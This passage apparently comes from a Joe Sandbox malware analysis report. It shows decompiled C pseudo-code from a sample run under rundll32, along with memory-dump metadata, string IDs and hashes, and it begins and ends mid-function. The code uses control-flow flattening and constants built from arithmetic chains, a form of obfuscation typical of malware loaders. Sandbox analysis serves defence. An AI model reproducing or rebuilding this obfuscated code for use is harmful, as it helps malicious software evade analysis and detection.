                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				signed int _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				signed int _v180;
                                                                                                                      				signed int _v184;
                                                                                                                      				signed int _v188;
                                                                                                                      				signed int _v192;
                                                                                                                      				signed int _v196;
                                                                                                                      				signed int _v200;
                                                                                                                      				signed int _v204;
                                                                                                                      				signed int _v208;
                                                                                                                      				signed int _v212;
                                                                                                                      				signed int _v216;
                                                                                                                      				signed int _v220;
                                                                                                                      				signed int _v224;
                                                                                                                      				signed int _v228;
                                                                                                                      				signed int _v232;
                                                                                                                      				signed int _v236;
                                                                                                                      				signed int _v240;
                                                                                                                      				signed int _v244;
                                                                                                                      				signed int _v248;
                                                                                                                      				signed int _v252;
                                                                                                                      				signed int _v256;
                                                                                                                      				signed int _v260;
                                                                                                                      				signed int _v264;
                                                                                                                      				signed int _v268;
                                                                                                                      				signed int _v272;
                                                                                                                      				signed int _v276;
                                                                                                                      				signed int _v280;
                                                                                                                      				signed int _v284;
                                                                                                                      				signed int _v288;
                                                                                                                      				signed int _v292;
                                                                                                                      				signed int _v296;
                                                                                                                      				void* __ecx;
                                                                                                                      				void* _t670;
                                                                                                                      				void* _t736;
                                                                                                                      				void* _t738;
                                                                                                                      				void* _t739;
                                                                                                                      				intOrPtr _t745;
                                                                                                                      				void* _t746;
                                                                                                                      				void* _t749;
                                                                                                                      				void* _t759;
                                                                                                                      				void* _t765;
                                                                                                                      				signed int _t772;
                                                                                                                      				signed int _t773;
                                                                                                                      				signed int _t774;
                                                                                                                      				signed int _t775;
                                                                                                                      				signed int _t776;
                                                                                                                      				signed int _t777;
                                                                                                                      				signed int _t778;
                                                                                                                      				signed int _t779;
                                                                                                                      				signed int _t780;
                                                                                                                      				signed int _t781;
                                                                                                                      				signed int _t782;
                                                                                                                      				signed int _t783;
                                                                                                                      				signed int _t784;
                                                                                                                      				signed int _t785;
                                                                                                                      				signed int _t786;
                                                                                                                      				signed int _t787;
                                                                                                                      				signed int _t788;
                                                                                                                      				void* _t789;
                                                                                                                      				void* _t859;
                                                                                                                      				signed int _t876;
                                                                                                                      				void* _t877;
                                                                                                                      				signed int _t879;
                                                                                                                      				void* _t880;
                                                                                                                      				void* _t883;
                                                                                                                      				void* _t884;
                                                                                                                      				void* _t885;
                                                                                                                      				void* _t891;
                                                                                                                      
                                                                                                                      				_push(_a24);
                                                                                                                      				_push(_a20);
                                                                                                                      				_push(0x20);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				E0034CF25(_t670);
                                                                                                                      				_v276 = 0xaaffe7;
                                                                                                                      				_t885 = _t884 + 0x20;
                                                                                                                      				_t883 = 0;
                                                                                                                      				_t765 = 0x92c7fbc;
                                                                                                                      				_t772 = 0x5f;
                                                                                                                      				_v276 = _v276 * 0x57;
                                                                                                                      				_v276 = _v276 * 0x22;
                                                                                                                      				_v276 = _v276 / _t772;
                                                                                                                      				_v276 = _v276 ^ 0x01ef6b71;
                                                                                                                      				_v80 = 0xefa32d;
                                                                                                                      				_v80 = _v80 + 0x395c;
                                                                                                                      				_v80 = _v80 ^ 0x00efdc89;
                                                                                                                      				_v208 = 0x14a646;
                                                                                                                      				_v208 = _v208 ^ 0x03e947f6;
                                                                                                                      				_t773 = 0x33;
                                                                                                                      				_v208 = _v208 * 7;
                                                                                                                      				_v208 = _v208 >> 7;
                                                                                                                      				_v208 = _v208 ^ 0x0037e257;
                                                                                                                      				_v108 = 0x55608a;
                                                                                                                      				_v108 = _v108 ^ 0x27d6d008;
                                                                                                                      				_v108 = _v108 + 0x510f;
                                                                                                                      				_v108 = _v108 ^ 0x27840191;
                                                                                                                      				_v224 = 0xd82d5c;
                                                                                                                      				_v120 = 0x3d033e;
                                                                                                                      				_v120 = _v120 | 0x1fa14a75;
                                                                                                                      				_v120 = _v120 / _t786;
                                                                                                                      				_v120 = _v120 ^ 0x01d2865b;
                                                                                                                      				_v212 = 0xed5cb5;
                                                                                                                      				_t787 = 0x53;
                                                                                                                      				_v212 = _v212 / _t787;
                                                                                                                      				_v212 = _v212 ^ 0x510fb6d8;
                                                                                                                      				_v212 = _v212 * 0x76;
                                                                                                                      				_v212 = _v212 ^ 0x5c26df9e;
                                                                                                                      				_v32 = 0x743d42;
                                                                                                                      				_v32 = _v32 * 0x19;
                                                                                                                      				_v32 = _v32 ^ 0x0b543fb1;
                                                                                                                      				_v140 = 0xd2e396;
                                                                                                                      				_v140 = _v140 + 0xbc2f;
                                                                                                                      				_v140 = _v140 | 0xffabdfb7;
                                                                                                                      				_v140 = _v140 ^ 0xfffefe2d;
                                                                                                                      				_v56 = 0xb6af07;
                                                                                                                      				_v56 = _v56 | 0x3c719b52;
                                                                                                                      				_v56 = _v56 ^ 0x3cf6fc1e;
                                                                                                                      				_v148 = 0x4e57f8;
                                                                                                                      				_v148 = _v148 / _t876;
                                                                                                                      				_v148 = _v148 << 4;
                                                                                                                      				_v148 = _v148 ^ 0x008180da;
                                                                                                                      				_t880 = 0x8b31915;
                                                                                                                      				_v44 = 0xa59d4d;
                                                                                                                      				_t877 = 0xef66089;
                                                                                                                      				_t788 = 0x2c;
                                                                                                                      				_v44 = _v44 / _t788;
                                                                                                                      				_v44 = _v44 ^ 0x000f19f4;
                                                                                                                      				_v60 = 0x2ad52f;
                                                                                                                      				_v60 = _v60 | 0x792352db;
                                                                                                                      				_v60 = _v60 ^ 0x7927d8fa;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					while(1) {
                                                                                                                      						L2:
                                                                                                                      						_t789 = 0x93fa1a;
                                                                                                                      						while(1) {
                                                                                                                      							L3:
                                                                                                                      							_t859 = 0x2c1be6e;
                                                                                                                      							do {
                                                                                                                      								L4:
                                                                                                                      								_t891 = _t765 - _t880;
                                                                                                                      								if(_t891 > 0) {
                                                                                                                      									__eflags = _t765 - 0x92c7fbc;
                                                                                                                      									if(__eflags == 0) {
                                                                                                                      										_t765 = 0x826e25d;
                                                                                                                      										goto L27;
                                                                                                                      									} else {
                                                                                                                      										__eflags = _t765 - 0xb519ee2;
                                                                                                                      										if(__eflags == 0) {
                                                                                                                      											_push(_v132);
                                                                                                                      											_t654 =  &_v92; // 0xeb365c56
                                                                                                                      											_push( *_t654);
                                                                                                                      											_push(0x341518);
                                                                                                                      											_t759 = E0035FBCF(_v68,  &_v12, _v20, _v200, _v116, _v76, E0034AB66(_v84, _v124, __eflags), _v208, _v216, _v84,  &_v8);
                                                                                                                      											_t885 = _t885 + 0x30;
                                                                                                                      											__eflags = _t759 - _v108;
                                                                                                                      											_t765 =  ==  ? 0x2c1be6e : _t877;
                                                                                                                      											E0034AE03(_v100, _v184, _v192, _t757);
                                                                                                                      											goto L25;
                                                                                                                      										} else {
                                                                                                                      											__eflags = _t765 - 0xcf70aca;
                                                                                                                      											if(_t765 == 0xcf70aca) {
                                                                                                                      												E003468DE(_v32, _v140, _v56, _v148, _v16);
                                                                                                                      												_t885 = _t885 + 0xc;
                                                                                                                      												_t765 = _t877;
                                                                                                                      												goto L1;
                                                                                                                      											} else {
                                                                                                                      												__eflags = _t765 - _t877;
                                                                                                                      												if(__eflags != 0) {
                                                                                                                      													goto L27;
                                                                                                                      												} else {
                                                                                                                      													E00347027(_v44, _v52, _v20, _v60);
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t891 == 0) {
                                                                                                                      										_t736 = E00353B45(_v224, _v156, _v232, _v240, _v64, _v248, _v12, _v256, _v16, _v20, _t789, _v164,  &_v24, _v264);
                                                                                                                      										_t885 = _t885 + 0x30;
                                                                                                                      										__eflags = _t736 - _v28;
                                                                                                                      										_t789 = 0x93fa1a;
                                                                                                                      										_t738 = 0x70434dd;
                                                                                                                      										_t765 =  ==  ? 0x93fa1a : 0xcf70aca;
                                                                                                                      										goto L3;
                                                                                                                      									} else {
                                                                                                                      										if(_t765 == _t789) {
                                                                                                                      											_t739 = E0034BA16(_a24, _v172, _v24, _v272, _v72, _v280, _a20, _v288);
                                                                                                                      											_t885 = _t885 + 0x18;
                                                                                                                      											__eflags = _t739 - _v40;
                                                                                                                      											_t738 = 0x70434dd;
                                                                                                                      											_t765 =  ==  ? 0x70434dd : 0x275f79a;
                                                                                                                      											goto L2;
                                                                                                                      										} else {
                                                                                                                      											if(_t765 == 0x275f79a) {
                                                                                                                      												E0034E723(_v296, _v176, _v24, _v120, _v212);
                                                                                                                      												_t885 = _t885 + 0xc;
                                                                                                                      												_t765 = 0xcf70aca;
                                                                                                                      												while(1) {
                                                                                                                      													L1:
                                                                                                                      													goto L2;
                                                                                                                      												}
                                                                                                                      											} else {
                                                                                                                      												if(_t765 == _t859) {
                                                                                                                      													_push(_t789);
                                                                                                                      													_push(_t789);
                                                                                                                      													_t745 = E00353512(_v12);
                                                                                                                      													__eflags = _t745;
                                                                                                                      													_v16 = _t745;
                                                                                                                      													_t765 =  !=  ? _t880 : _t877;
                                                                                                                      													while(1) {
                                                                                                                      														L1:
                                                                                                                      														goto L2;
                                                                                                                      													}
                                                                                                                      												} else {
                                                                                                                      													if(_t765 == _t738) {
                                                                                                                      														_t746 = E0035FDA3(_v112, _a8, _v180, _v24, _v220, _v128, 0x20);
                                                                                                                      														_t885 = _t885 + 0x14;
                                                                                                                      														_t765 = 0x275f79a;
                                                                                                                      														__eflags = _t746 - _v252;
                                                                                                                      														_t883 =  ==  ? 1 : _t883;
                                                                                                                      														while(1) {
                                                                                                                      															L1:
                                                                                                                      															L2:
                                                                                                                      															_t789 = 0x93fa1a;
                                                                                                                      															L3:
                                                                                                                      															_t859 = 0x2c1be6e;
                                                                                                                      															goto L4;
                                                                                                                      														}
                                                                                                                      													} else {
                                                                                                                      														_t896 = _t765 - 0x826e25d;
                                                                                                                      														if(_t765 == 0x826e25d) {
                                                                                                                      															_push(_v96);
                                                                                                                      															_push(_v292);
                                                                                                                      															_push(0x341568);
                                                                                                                      															_t749 = E0034AB66(_v88, _v152, _t896);
                                                                                                                      															_push(_v136);
                                                                                                                      															_push(_v236);
                                                                                                                      															_push(0x341538);
                                                                                                                      															E00350EDA(E0034AB66(_v168, _v48, _t896), _v276, _v104, _t749,  &_v20, _v196, _v284);
                                                                                                                      															_t765 =  ==  ? 0xb519ee2 : 0x7228e80;
                                                                                                                      															E0034AE03(_v268, _v228, _v160, _t749);
                                                                                                                      															E0034AE03(_v36, _v260, _v204, _t750);
                                                                                                                      															_t885 = _t885 + 0x3c;
                                                                                                                      															_t877 = 0xef66089;
                                                                                                                      															L25:
                                                                                                                      															_t880 = 0x8b31915;
                                                                                                                      															_t738 = 0x70434dd;
                                                                                                                      															_t789 = 0x93fa1a;
                                                                                                                      															_t859 = 0x2c1be6e;
                                                                                                                      														}
                                                                                                                      														goto L27;
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      								L22:
                                                                                                                      								return _t883;
                                                                                                                      								L27:
                                                                                                                      							} while (_t765 != 0x7228e80);
                                                                                                                      							goto L22;
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}

                                                                                                                      0x003519f4
                                                                                                                      0x003519ff
                                                                                                                      0x00351a0c
                                                                                                                      0x00351a10
                                                                                                                      0x00351a15
                                                                                                                      0x00351a1d
                                                                                                                      0x00351a27
                                                                                                                      0x00351a32
                                                                                                                      0x00351a3d
                                                                                                                      0x00351a48
                                                                                                                      0x00351a53
                                                                                                                      0x00351a5e
                                                                                                                      0x00351a69
                                                                                                                      0x00351a74
                                                                                                                      0x00351a7c
                                                                                                                      0x00351a87
                                                                                                                      0x00351a92
                                                                                                                      0x00351a9a
                                                                                                                      0x00351aa2
                                                                                                                      0x00351aaa
                                                                                                                      0x00351aaf
                                                                                                                      0x00351ab7
                                                                                                                      0x00351ac2
                                                                                                                      0x00351acd
                                                                                                                      0x00351ad8
                                                                                                                      0x00351ae3
                                                                                                                      0x00351aee
                                                                                                                      0x00351af6
                                                                                                                      0x00351b01
                                                                                                                      0x00351b16
                                                                                                                      0x00351b19
                                                                                                                      0x00351b20
                                                                                                                      0x00351b2b
                                                                                                                      0x00351b3b
                                                                                                                      0x00351b3f
                                                                                                                      0x00351b47
                                                                                                                      0x00351b4f
                                                                                                                      0x00351b57
                                                                                                                      0x00351b62
                                                                                                                      0x00351b6d
                                                                                                                      0x00351b75
                                                                                                                      0x00351b80
                                                                                                                      0x00351b8b
                                                                                                                      0x00351b96
                                                                                                                      0x00351ba1
                                                                                                                      0x00351bac
                                                                                                                      0x00351bb8
                                                                                                                      0x00351bbd
                                                                                                                      0x00351bc3
                                                                                                                      0x00351bcb
                                                                                                                      0x00351bd0
                                                                                                                      0x00351bd8
                                                                                                                      0x00351be0
                                                                                                                      0x00351be5
                                                                                                                      0x00351bed
                                                                                                                      0x00351bf0
                                                                                                                      0x00351bf4
                                                                                                                      0x00351bfc
                                                                                                                      0x00351c04
                                                                                                                      0x00351c11
                                                                                                                      0x00351c15
                                                                                                                      0x00351c1d
                                                                                                                      0x00351c25
                                                                                                                      0x00351c2d
                                                                                                                      0x00351c32
                                                                                                                      0x00351c3a
                                                                                                                      0x00351c42
                                                                                                                      0x00351c4a
                                                                                                                      0x00351c5d
                                                                                                                      0x00351c64
                                                                                                                      0x00351c6c
                                                                                                                      0x00351c77
                                                                                                                      0x00351c84
                                                                                                                      0x00351c8f
                                                                                                                      0x00351c9a
                                                                                                                      0x00351ca2
                                                                                                                      0x00351caa
                                                                                                                      0x00351cb2
                                                                                                                      0x00351cb7
                                                                                                                      0x00351cbf
                                                                                                                      0x00351ccd
                                                                                                                      0x00351cd2
                                                                                                                      0x00351cdc
                                                                                                                      0x00351ce1
                                                                                                                      0x00351cec
                                                                                                                      0x00351cef
                                                                                                                      0x00351cf3
                                                                                                                      0x00351cfb
                                                                                                                      0x00351d06
                                                                                                                      0x00351d11
                                                                                                                      0x00351d1c
                                                                                                                      0x00351d27
                                                                                                                      0x00351d2f
                                                                                                                      0x00351d37
                                                                                                                      0x00351d42
                                                                                                                      0x00351d4d
                                                                                                                      0x00351d58
                                                                                                                      0x00351d63
                                                                                                                      0x00351d6e
                                                                                                                      0x00351d79
                                                                                                                      0x00351d84
                                                                                                                      0x00351d8f
                                                                                                                      0x00351d9a
                                                                                                                      0x00351da5
                                                                                                                      0x00351db0
                                                                                                                      0x00351dbd
                                                                                                                      0x00351dc1
                                                                                                                      0x00351dd1
                                                                                                                      0x00351dd5
                                                                                                                      0x00351ddd
                                                                                                                      0x00351de8
                                                                                                                      0x00351dfa
                                                                                                                      0x00351dff
                                                                                                                      0x00351e08
                                                                                                                      0x00351e13
                                                                                                                      0x00351e1e
                                                                                                                      0x00351e29
                                                                                                                      0x00351e34
                                                                                                                      0x00351e3c
                                                                                                                      0x00351e44
                                                                                                                      0x00351e50
                                                                                                                      0x00351e53
                                                                                                                      0x00351e57
                                                                                                                      0x00351e5f
                                                                                                                      0x00351e6a
                                                                                                                      0x00351e75
                                                                                                                      0x00351e80
                                                                                                                      0x00351e8b
                                                                                                                      0x00351e96
                                                                                                                      0x00351ea1
                                                                                                                      0x00351ea8
                                                                                                                      0x00351eb5
                                                                                                                      0x00351ec0
                                                                                                                      0x00351ec8
                                                                                                                      0x00351ed4
                                                                                                                      0x00351ed7
                                                                                                                      0x00351ede
                                                                                                                      0x00351ee9
                                                                                                                      0x00351ef4
                                                                                                                      0x00351f04
                                                                                                                      0x00351f08
                                                                                                                      0x00351f0d
                                                                                                                      0x00351f12
                                                                                                                      0x00351f1a
                                                                                                                      0x00351f25
                                                                                                                      0x00351f2d
                                                                                                                      0x00351f40
                                                                                                                      0x00351f47
                                                                                                                      0x00351f52
                                                                                                                      0x00351f5d
                                                                                                                      0x00351f73
                                                                                                                      0x00351f7a
                                                                                                                      0x00351f85
                                                                                                                      0x00351f97
                                                                                                                      0x00351f9c
                                                                                                                      0x00351fa5
                                                                                                                      0x00351fb0
                                                                                                                      0x00351fbb
                                                                                                                      0x00351fc3
                                                                                                                      0x00351fcb
                                                                                                                      0x00351fd3
                                                                                                                      0x00351fd8
                                                                                                                      0x00351fe0
                                                                                                                      0x00351fe8
                                                                                                                      0x00351ff1
                                                                                                                      0x00351ff6
                                                                                                                      0x00351ffc
                                                                                                                      0x00352004
                                                                                                                      0x0035200c
                                                                                                                      0x00352017
                                                                                                                      0x00352022
                                                                                                                      0x0035202d
                                                                                                                      0x00352035
                                                                                                                      0x0035203d
                                                                                                                      0x00352045
                                                                                                                      0x0035204d
                                                                                                                      0x00352058
                                                                                                                      0x00352063
                                                                                                                      0x0035206e
                                                                                                                      0x00352079
                                                                                                                      0x00352081
                                                                                                                      0x00352086
                                                                                                                      0x0035208b
                                                                                                                      0x00352090
                                                                                                                      0x00352098
                                                                                                                      0x003520a3
                                                                                                                      0x003520ae
                                                                                                                      0x003520b6
                                                                                                                      0x003520c1
                                                                                                                      0x003520cd
                                                                                                                      0x003520d0
                                                                                                                      0x003520dd
                                                                                                                      0x003520e0
                                                                                                                      0x003520e4
                                                                                                                      0x003520e9
                                                                                                                      0x003520f1
                                                                                                                      0x003520fc
                                                                                                                      0x00352104
                                                                                                                      0x0035210f
                                                                                                                      0x00352117
                                                                                                                      0x00352127
                                                                                                                      0x0035212b
                                                                                                                      0x00352133
                                                                                                                      0x0035213b
                                                                                                                      0x0035214e
                                                                                                                      0x00352151
                                                                                                                      0x00352158
                                                                                                                      0x00352163
                                                                                                                      0x0035216e
                                                                                                                      0x00352181
                                                                                                                      0x00352188
                                                                                                                      0x00352190
                                                                                                                      0x0035219b
                                                                                                                      0x003521a3
                                                                                                                      0x003521a8
                                                                                                                      0x003521b0
                                                                                                                      0x003521b8

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: B=t$D$D'$Kk$V\6$W7$\9$d_2$^$q
                                                                                                                      • API String ID: 0-1686049362
                                                                                                                      • Opcode ID: 65f945308803f898ba8015a14f81b113aa519c5c28223350120097287859f536
                                                                                                                      • Instruction ID: 23db394d3d11c580005eac22c7d85888f6ed874a5b7da9142c7267082c71493d
                                                                                                                      • Opcode Fuzzy Hash: 65f945308803f898ba8015a14f81b113aa519c5c28223350120097287859f536
                                                                                                                      • Instruction Fuzzy Hash: 3872FF715083809FD379CF65C58AB8BBBE2BBC5304F10891DE6DA9A260D7B19949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E00347B82(void* __ecx) {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				char _v1560;
                                                                                                                      				char _v2080;
                                                                                                                      				char _v2600;
                                                                                                                      				signed int _v2604;
                                                                                                                      				signed int _v2608;
                                                                                                                      				signed int _v2612;
                                                                                                                      				signed int _v2616;
                                                                                                                      				signed int _v2620;
                                                                                                                      				signed int _v2624;
                                                                                                                      				signed int _v2628;
                                                                                                                      				signed int _v2632;
                                                                                                                      				signed int _v2636;
                                                                                                                      				signed int _v2640;
                                                                                                                      				signed int _v2644;
                                                                                                                      				signed int _v2648;
                                                                                                                      				signed int _v2652;
                                                                                                                      				signed int _v2656;
                                                                                                                      				signed int _v2660;
                                                                                                                      				signed int _v2664;
                                                                                                                      				signed int _v2668;
                                                                                                                      				signed int _v2672;
                                                                                                                      				signed int _v2676;
                                                                                                                      				signed int _v2680;
                                                                                                                      				signed int _v2684;
                                                                                                                      				signed int _v2688;
                                                                                                                      				signed int _v2692;
                                                                                                                      				signed int _v2696;
                                                                                                                      				signed int _v2700;
                                                                                                                      				signed int _v2704;
                                                                                                                      				signed int _v2708;
                                                                                                                      				signed int _v2712;
                                                                                                                      				signed int _v2716;
                                                                                                                      				signed int _v2720;
                                                                                                                      				signed int _v2724;
                                                                                                                      				signed int _v2728;
                                                                                                                      				signed int _v2732;
                                                                                                                      				signed int _v2736;
                                                                                                                      				signed int _v2740;
                                                                                                                      				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _t404;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				signed int _t430;
				void* _t463;
				void* _t464;
				signed int* _t468;

				_t468 =  &_v2776;
				_v2716 = 0x9827f0;
				_v2716 = _v2716 << 9;
				_v2716 = _v2716 >> 4;
				_v2716 = _v2716 ^ 0x0304fe29;
				_v2684 = 0x251356;
				_v2684 = _v2684 + 0x1e2;
				_v2684 = _v2684 | 0xda75bfb2;
				_v2684 = _v2684 ^ 0xda7428eb;
				_v2768 = 0x24e368;
				_v2768 = _v2768 ^ 0xd5a17b15;
				_v2768 = _v2768 << 7;
				_v2768 = _v2768 | 0xced33043;
				_v2768 = _v2768 ^ 0xced6ff80;
				_v2736 = 0xa2f196;
				_v2736 = _v2736 + 0x6d02;
				_v2736 = _v2736 << 8;
				_v2736 = _v2736 * 0x63;
				_t463 = __ecx;
				_v2736 = _v2736 ^ 0x2d971c6c;
				_t464 = 0x422d362;
				_v2760 = 0x391c44;
				_v2760 = _v2760 >> 0x10;
				_v2760 = _v2760 + 0xe88b;
				_v2760 = _v2760 + 0x506d;
				_v2760 = _v2760 ^ 0x00052d5d;
				_v2744 = 0x960a81;
				_t421 = 3;
				_v2744 = _v2744 * 0x47;
				_v2744 = _v2744 * 0x66;
				_v2744 = _v2744 + 0x35e4;
				_v2744 = _v2744 ^ 0x94845397;
				_v2604 = 0xe8b0f5;
				_v2604 = _v2604 + 0x9847;
				_v2604 = _v2604 ^ 0x00e1425b;
				_v2712 = 0x9aefe1;
				_v2712 = _v2712 + 0x2d7a;
				_v2712 = _v2712 | 0x79d44310;
				_v2712 = _v2712 ^ 0x79db8805;
				_v2728 = 0x1377c5;
				_v2728 = _v2728 | 0x6e97ff53;
				_v2728 = _v2728 + 0x22de;
				_v2728 = _v2728 ^ 0x6e9b6172;
				_v2752 = 0xb1335e;
				_v2752 = _v2752 ^ 0x2dbaf336;
				_v2752 = _v2752 / _t421;
				_v2752 = _v2752 ^ 0xfe92c193;
				_v2752 = _v2752 ^ 0xf19577cc;
				_v2660 = 0x2952e4;
				_v2660 = _v2660 | 0x79708fb3;
				_v2660 = _v2660 ^ 0x797ec65d;
				_v2680 = 0x48d1a6;
				_t422 = 0x34;
				_v2680 = _v2680 / _t422;
				_v2680 = _v2680 * 0x69;
				_v2680 = _v2680 ^ 0x0099bc36;
				_v2612 = 0xcdd72a;
				_v2612 = _v2612 * 0x50;
				_v2612 = _v2612 ^ 0x4054338c;
				_v2672 = 0x8e3222;
				_v2672 = _v2672 << 1;
				_v2672 = _v2672 ^ 0x0115b014;
				_v2772 = 0xea36ba;
				_v2772 = _v2772 + 0xffff2869;
				_v2772 = _v2772 >> 2;
				_v2772 = _v2772 ^ 0xcd7b9291;
				_v2772 = _v2772 ^ 0xcd4b3afc;
				_v2776 = 0x8f99fe;
				_v2776 = _v2776 + 0x5190;
				_v2776 = _v2776 + 0xffffc7d6;
				_v2776 = _v2776 ^ 0x0f761f96;
				_v2776 = _v2776 ^ 0x0ff50908;
				_v2652 = 0xb833cd;
				_t423 = 0x31;
				_v2652 = _v2652 * 0x75;
				_v2652 = _v2652 ^ 0x5422af3f;
				_v2620 = 0x8c6cc6;
				_v2620 = _v2620 + 0xffff9da6;
				_v2620 = _v2620 ^ 0x008df9f5;
				_v2688 = 0x40b504;
				_v2688 = _v2688 ^ 0xc3e337a5;
				_v2688 = _v2688 + 0x808c;
				_v2688 = _v2688 ^ 0xc3a77743;
				_v2704 = 0x4030d0;
				_v2704 = _v2704 | 0xd8d5f091;
				_v2704 = _v2704 ^ 0xb4a4ac2b;
				_v2704 = _v2704 ^ 0x6c7bdbfc;
				_v2644 = 0xafd4ef;
				_v2644 = _v2644 * 0x3b;
				_v2644 = _v2644 ^ 0x288fb790;
				_v2764 = 0x1d91e2;
				_v2764 = _v2764 | 0xd96eda72;
				_v2764 = _v2764 + 0xffffbbe3;
				_v2764 = _v2764 >> 0xc;
				_v2764 = _v2764 ^ 0x000d90f8;
				_v2696 = 0x4b7a41;
				_v2696 = _v2696 | 0xbfeeeeed;
				_v2696 = _v2696 ^ 0xbfe32e95;
				_v2708 = 0x8f6339;
				_v2708 = _v2708 | 0xa71a0417;
				_v2708 = _v2708 + 0xffff51d8;
				_v2708 = _v2708 ^ 0xa79b9aa8;
				_v2636 = 0x12e7d6;
				_v2636 = _v2636 * 0x21;
				_v2636 = _v2636 ^ 0x026e6de9;
				_v2756 = 0xd5c5d;
				_v2756 = _v2756 ^ 0x716456fc;
				_v2756 = _v2756 + 0xa334;
				_v2756 = _v2756 >> 0xc;
				_v2756 = _v2756 ^ 0x000918e1;
				_v2608 = 0xbb78a7;
				_v2608 = _v2608 + 0xd6b3;
				_v2608 = _v2608 ^ 0x00b2dabe;
				_v2668 = 0xad3636;
				_v2668 = _v2668 + 0xffffa01e;
				_v2668 = _v2668 ^ 0x00a02f3e;
				_v2628 = 0x4494fc;
				_v2628 = _v2628 / _t423;
				_v2628 = _v2628 ^ 0x0009fca5;
				_v2748 = 0x660e04;
				_v2748 = _v2748 + 0xffffa723;
				_v2748 = _v2748 | 0x67469fe4;
				_t424 = 0x4b;
				_v2748 = _v2748 * 5;
				_v2748 = _v2748 ^ 0x050bc0b3;
				_v2616 = 0xd4c89d;
				_v2616 = _v2616 << 7;
				_v2616 = _v2616 ^ 0x6a6fac0f;
				_v2700 = 0xaa08c8;
				_v2700 = _v2700 + 0xffffd108;
				_v2700 = _v2700 / _t424;
				_v2700 = _v2700 ^ 0x0001fda8;
				_v2732 = 0x67cb1c;
				_v2732 = _v2732 << 5;
				_v2732 = _v2732 | 0x2b3c2ffa;
				_v2732 = _v2732 ^ 0x295e7aa1;
				_v2732 = _v2732 ^ 0x06a01d44;
				_v2656 = 0xfaf065;
				_v2656 = _v2656 + 0xffff35fd;
				_v2656 = _v2656 ^ 0x00f58676;
				_v2740 = 0x2bd94;
				_v2740 = _v2740 + 0x3f47;
				_t425 = 0x2a;
				_v2740 = _v2740 / _t425;
				_v2740 = _v2740 ^ 0xca3749d7;
				_v2740 = _v2740 ^ 0xca3fc9be;
				_v2664 = 0x3942c4;
				_v2664 = _v2664 << 0xe;
				_v2664 = _v2664 ^ 0x50bf8d15;
				_v2724 = 0xb2ae33;
				_t426 = 0x22;
				_v2724 = _v2724 / _t426;
				_v2724 = _v2724 << 1;
				_v2724 = _v2724 ^ 0x6c628229;
				_v2724 = _v2724 ^ 0x6c6ae222;
				_v2640 = 0xd32362;
				_v2640 = _v2640 + 0xffff88f4;
				_v2640 = _v2640 ^ 0x00d4f71b;
				_v2648 = 0x3e5b4d;
				_v2648 = _v2648 + 0x4f8c;
				_v2648 = _v2648 ^ 0x003b681e;
				_v2676 = 0xc6bb8b;
				_v2676 = _v2676 << 4;
				_t427 = 0x14;
				_v2676 = _v2676 / _t427;
				_v2676 = _v2676 ^ 0x009ad4f5;
				_v2720 = 0xa3b34d;
				_v2720 = _v2720 + 0xffff97dd;
				_v2720 = _v2720 | 0x7136ebef;
				_v2720 = _v2720 ^ 0x71b8bb4e;
				_v2692 = 0xa7ff58;
				_t404 = _v2692 * 0x31;
				_v2692 = _t404;
				_v2692 = _v2692 >> 4;
				_v2692 = _v2692 ^ 0x020bdfc2;
				_v2624 = 0xa501ce;
				_v2624 = _v2624 | 0xdc20330f;
				_v2624 = _v2624 ^ 0xdca3e6f8;
				_v2632 = 0xa992b7;
				_v2632 = _v2632 | 0x4e4d69fe;
				_v2632 = _v2632 ^ 0x4ee71179;
				while(_t464 != 0x2953b22) {
					if(_t464 == 0x422d362) {
						_t464 = 0xe704baa;
						continue;
					} else {
